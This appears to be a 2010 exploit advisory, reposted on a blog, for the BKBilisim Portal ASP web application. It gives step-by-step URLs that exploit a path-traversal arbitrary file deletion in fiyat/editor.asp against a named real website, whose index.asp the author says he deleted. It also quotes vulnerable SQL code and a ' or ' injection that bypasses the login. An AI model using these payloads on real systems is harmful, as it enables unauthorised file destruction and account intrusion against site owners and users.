# BKBilisim Portal Multiple Vulnerability
# Author ZoRLu
# mail-msn: admin@yildirimordulari.com
# Home: z0rlu.blogspot.com
# Date: 07/09/2010
# Demo: http://www.bio-zeytolive.com
# Scrp: http://www.aspindir.com/Goster/5531
# Tesekkur: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
# Temenni: Hayirli Bayramlar
1. Arbitrary File Delete
target: http://www.bio-zeytolive.com / i deleted index.asp
vuln. file:
/fiyat/editor.asp
example:
you look first here:
http://www.bio-zeytolive.com/upload.asp
after go here:
http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../upload.asp
more after go here:
http://www.bio-zeytolive.com/upload.asp
and you will see file is delete
or
you look fisrt here:
http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp
after you go here:
http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../kategoriadmin/kategori_sil.asp
more after you go here:
http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp
and you will see file is delete
you can do this, for any file
2. Bypass
Vuln. file:
giris.asp
//
kullanici = Request.Form("kullanici") //line 4
parola = Request.Form("parola") //line 5
sql="Select * From uyeler where onay=1 and kullanici = '"& kullanici &"' and parola = '" &parola&"' " //line 13
//
you go here:
http://www.bio-zeytolive.com/uye.asp
kullanici adi: zrl or write anything
parola: ' or '
you will be login
# Inj3ct0r.com [2010-09-08]
7 Eylül 2010 Salı
BKBilisim Portal Multiple Vulnerability
http://inj3ct0r.com/exploits/14028
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder